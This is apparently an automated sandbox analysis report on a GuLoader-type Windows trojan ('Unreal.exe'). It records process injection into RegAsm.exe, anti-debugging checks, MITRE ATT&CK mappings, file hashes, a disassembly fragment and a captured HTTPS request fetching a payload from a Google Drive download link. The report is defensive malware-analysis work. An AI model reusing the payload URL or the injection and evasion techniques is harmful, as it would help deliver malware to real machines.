Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AD56C mov eax, dword ptr fs:[00000030h]	5_2_011AD56C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AE567 mov eax, dword ptr fs:[00000030h]	5_2_011AE567
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A9749 mov eax, dword ptr fs:[00000030h]	5_2_011A9749

Source: C:\Users\user\Desktop\Unreal.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Unreal.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 11A0000

Jump to behavior

Source: C:\Users\user\Desktop\Unreal.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'

Jump to behavior

Source: RegAsm.exe, 00000005.00000000.18422380564.00000000018E0000.00000002.00020000.sdmp	Binary or memory string: ,Program Managersw
Source: RegAsm.exe, 00000005.00000000.18422380564.00000000018E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000005.00000000.18422380564.00000000018E0000.00000002.00020000.sdmp	Binary or memory string: Progman

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection112	Virtualization/Sandbox Evasion22	Input Capture1	Security Software Discovery321	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection112	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Unreal.exe	41%	Virustotal		Browse
Unreal.exe	13%	ReversingLabs	Win32.Trojan.Ursu
Unreal.exe	100%	Avira	TR/AD.Nekark.hrjdi

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.Unreal.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.hrjdi		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.142	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.google.com/	RegAsm.exe, 00000005.00000002.18569479870.00000000012D8000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.142	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1375
Start date:	27.09.2021
Start time:	20:51:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Unreal.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/4@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 65% Number of executed functions: 15 Number of non-executed functions: 12
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.19.171, 51.105.236.244, 20.82.210.154, 40.126.31.141, 20.190.159.138, 20.190.159.132, 40.126.31.8, 40.126.31.6, 40.126.31.1, 40.126.31.139, 40.126.31.143, 52.182.143.212, 52.109.8.21 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, www.tm.a.prd.aadg.akadns.net, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, arc.msn.com, login.msa.msidentity.com, prod.nexusrules.live.com.akadns.net, wdcpalt.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:54:18	API Interceptor	1x Sleep call for process: RegAsm.exe modified
20:58:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	EITyS0c1l1.exe	Get hash	malicious	Browse	142.250.185.142
	fTset285bI.exe	Get hash	malicious	Browse	142.250.185.142
	ejecutable.exe	Get hash	malicious	Browse	142.250.185.142
	gmT455QDI6.exe	Get hash	malicious	Browse	142.250.185.142
	IdI36XfAJc.exe	Get hash	malicious	Browse	142.250.185.142
	CYqow0VzsU.exe	Get hash	malicious	Browse	142.250.185.142
	YMFYAIMpF8.exe	Get hash	malicious	Browse	142.250.185.142
	AO8LQp0Yff.exe	Get hash	malicious	Browse	142.250.185.142
	xtlA67ZUPd.exe	Get hash	malicious	Browse	142.250.185.142
	LISTA DE PEDIDO DE COMPRA.exe	Get hash	malicious	Browse	142.250.185.142
	0zK7HxQE65.exe	Get hash	malicious	Browse	142.250.185.142
	GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709212890.exe	Get hash	malicious	Browse	142.250.185.142
	PO-003785GMHN.exe	Get hash	malicious	Browse	142.250.185.142
	Image-Scan-80195056703950029289.exe	Get hash	malicious	Browse	142.250.185.142
	NH8Oxi5PZo.exe	Get hash	malicious	Browse	142.250.185.142
	GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe	Get hash	malicious	Browse	142.250.185.142
	FDVCyigTWH.exe	Get hash	malicious	Browse	142.250.185.142
	PO-003785GMHN.exe	Get hash	malicious	Browse	142.250.185.142
	cYKFZFK0Rg.exe	Get hash	malicious	Browse	142.250.185.142
	svchost.exe	Get hash	malicious	Browse	142.250.185.142

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_29bf8efa3d478bed9ebb8bc4694e8e89a3debe79_e9e275a3_fdc547f4-9504-4479-9625-faeed7b4411d\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	14176
Entropy (8bit):	3.766425811864498
Encrypted:	false
SSDEEP:	192:O6tb1o4TmSaAa403TaU5QPmRtDu76DfAIO8ErP6G:LLoFSaA4aU++tDu76DfAIO8wPb
MD5:	5FC0B172E812246939CC8B1BE390DDA7
SHA1:	93A535B66F6ED314ECCA3B4427CADDA9A0DBD0CF
SHA-256:	91D0643FDBC69EEAF4F4AFDCA15A887747B87A9A38DDC3316ED9C13E702492A7
SHA-512:	56032C67E020E08DAA388912387D21288DBF4798D9769B0EC5569406408C32CC2789584B5BC64D4EE4C223D3F04BA3BA90EFC41D144C0BA7EBB57CBC0393AB3E
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.4.6.3.0.2.8.8.6.6.7.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.4.6.3.0.5.3.8.6.0.6.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.c.5.4.7.f.4.-.9.5.0.4.-.4.4.7.9.-.9.6.2.5.-.f.a.e.e.d.7.b.4.4.1.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.4.d.0.8.b.8.-.1.e.f.b.-.4.d.4.6.-.b.4.9.3.-.7.d.7.f.b.d.2.7.b.c.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.0.-.0.0.0.1.-.0.0.1.0.-.9.5.f.4.-.3.c.6.2.d.9.b.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.e.e.8.b.2.5.7.3.f.7.1.e.8.d.5.c.3.e.e.7.e.5.3.a.f.3.e.6.7.7.2.e.0.9.0.d.0.f.3.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF3A.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Sep 27 19:58:24 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	80022
Entropy (8bit):	2.1265006630353493
Encrypted:	false
SSDEEP:	384:93oS+EOkPo9WxGmYCCGLEKgWMc4z65CqRW:doQzoKgJGAc2W5Cr
MD5:	8BCEB4454D9819731E1761C2A6E972AE
SHA1:	1401A7F262B6763CF4C727B709397324C47D421E
SHA-256:	4F9F778860BD4BB3F900F956164809B012E88D2163B810640757BD4B3106AB34
SHA-512:	0AA178BC5101D4C39A11570E68C86849E930A472672CA513FF0D3D2592514FC45AA311039EE2D0E2CC7AA92DE46A802E2C1484E5591C6C9F4124D05A8601D60F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......`"Ra..............................bJ.......(......GenuineIntel...........T.......P...J!Ra.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4AA.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	3.7295034335846666
Encrypted:	false
SSDEEP:	192:R9l7lZNiKS6RuYzlN4aKpDN89bU5yVsfgcm:R9lnNi/6YYpbUdf6
MD5:	C463A3A75710B11F01E340F0278E3405
SHA1:	91550756DC5D55787972FF1F1CD4392E1B0C9984
SHA-256:	7CC178D9A1900EC7EC2995D8D28D01CC12EDD3B0B0C91633D49D5EC722E8D6E0
SHA-512:	C09A00D3FAE29B339BC69A29463A39AFFCB832F467451ED6B675BA072161751DD032CBA4791ECC5A428849D531E23DF64EF7FD1AB8E317A5692545DC68D66328
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5D4.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4831
Entropy (8bit):	4.520189012806639
Encrypted:	false
SSDEEP:	48:cvIwwtl8zs/fe702I7VFJ5WS2CfjkZs3rm8M4JfuDmQOqFX+q8oBXzOGt/ELu88x:uILf/27GySPfRJfuDzv5Jau84u8rd
MD5:	A260A2CC7C8DCE6EC732391835E709CF
SHA1:	4C51312ADCE38B3D765FB4B74EDA76C0BAC7B02A
SHA-256:	D8A17C4A1E416BBD7B28A2AB01026BFFC2C8FC0093AA87B216F0797816366CD4
SHA-512:	13B08952B12C9D1670438FAE7F2E45BFDD210EABE5F003AAACF0276D20907548FBF23CFA3B6F5971F421556AF61E6D5C8AE48D42DC08E81387F35CA3CC44BD37
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221284720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.281321845122127
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Unreal.exe
File size:	102400
MD5:	35a93d1f2edc044b3d8289abfeb17a43
SHA1:	c29f2524ae4bd239c849720b1fc6ce5c13bee93b
SHA256:	88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385
SHA512:	dab0233817f1a28f0e1d15eb449d9c3c364796f6ddd66ced4307f3359635c29f38f80edd5e348bba03dd01d5522d358df1abd6d59e9ae94e750238af53b04bff
SSDEEP:	1536:yS+Spugs2L010fBhmNDLI41mFLHvHWJbrZk5Le5O3VzM/:F5puZA01iBYNh1m1HvHwfZkRz0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...UL[W.................P...0...............`....@................

File Icon


Icon Hash:	78f8d6d4ac88d0e2

Static PE Info

General
Entrypoint:	0x4012d4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x575B4C55 [Fri Jun 10 23:25:09 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1eb0aaa4f15bbd841e91215ce68e26d2

Entrypoint Preview

Instruction
push 00413CE4h
call 00007F14483BB2E5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
retf
dec ebx
enter 5C49h, 45h
or byte ptr [eax-32482CABh], 0000002Dh
mov dword ptr [eax], 00000000h
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, ah
call 00007F14C182B314h
insd
outsb
outsd
add byte ptr [ecx+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add dword ptr [55396847h], ebp
retf
adc ecx, dword ptr [ecx-62h]
xor ch, ch
mov byte ptr [edx+ebx*2], dl
xor ah, byte ptr [ecx+05h]
adc al, dh
stosd
in eax, 79h
push ecx
inc eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x153b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x1cb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xdc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14788	0x15000	False	0.563720703125	data	6.65071196081	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0x9f4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x1cb8	0x2000	False	0.26416015625	data	3.4642899067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x18b7a	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
CUSTOM	0x185fc	0x57e	MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel	English	United States
CUSTOM	0x1807e	0x57e	MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel	English	United States
CUSTOM	0x17f40	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
RT_ICON	0x178d8	0x668	dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280
RT_ICON	0x175f0	0x2e8	data
RT_ICON	0x174c8	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x17498	0x30	data
RT_VERSION	0x17230	0x268	MS Windows COFF Motorola 68000 object file	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Unreal
FileVersion	1.00
CompanyName	CelRox
Comments	CelRox
ProductName	CelRox
ProductVersion	1.00
FileDescription	CelRox
OriginalFilename	Unreal.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 20:54:19.068927050 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.068996906 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.069155931 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.083753109 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.083803892 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.117774963 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.118005037 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.118438959 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.118678093 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.229274988 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.230015993 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.230144024 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.232552052 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.273940086 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.395497084 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.395689964 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.395735025 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.395879984 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.395911932 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.395955086 CEST	443	49787	142.250.185.142	192.168.11.20
Sep 27, 2021 20:54:19.396060944 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.404009104 CEST	49787	443	192.168.11.20	142.250.185.142
Sep 27, 2021 20:54:19.404093027 CEST	443	49787	142.250.185.142	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 20:53:07.623712063 CEST	61149	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:53:07.632781029 CEST	53	61149	1.1.1.1	192.168.11.20
Sep 27, 2021 20:53:07.705615997 CEST	65068	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:53:07.855164051 CEST	53	65068	1.1.1.1	192.168.11.20
Sep 27, 2021 20:53:58.332108021 CEST	51974	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:53:58.341330051 CEST	53	51974	1.1.1.1	192.168.11.20
Sep 27, 2021 20:54:19.046786070 CEST	52567	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:54:19.055619955 CEST	53	52567	1.1.1.1	192.168.11.20
Sep 27, 2021 20:58:26.652220964 CEST	65145	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:58:26.661173105 CEST	53	65145	1.1.1.1	192.168.11.20
Sep 27, 2021 20:58:27.730400085 CEST	54120	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:58:27.739698887 CEST	53	54120	1.1.1.1	192.168.11.20
Sep 27, 2021 20:59:00.277707100 CEST	50324	53	192.168.11.20	1.1.1.1
Sep 27, 2021 20:59:00.286663055 CEST	53	50324	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 20:54:19.046786070 CEST	192.168.11.20	1.1.1.1	0xd244	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 20:54:19.055619955 CEST	1.1.1.1	192.168.11.20	0xd244	No error (0)	drive.google.com		142.250.185.142	A (IP address)	IN (0x0001)
Sep 27, 2021 20:58:26.661173105 CEST	1.1.1.1	192.168.11.20	0x120e	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49787	142.250.185.142	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-27 18:54:19 UTC	0	OUT	GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
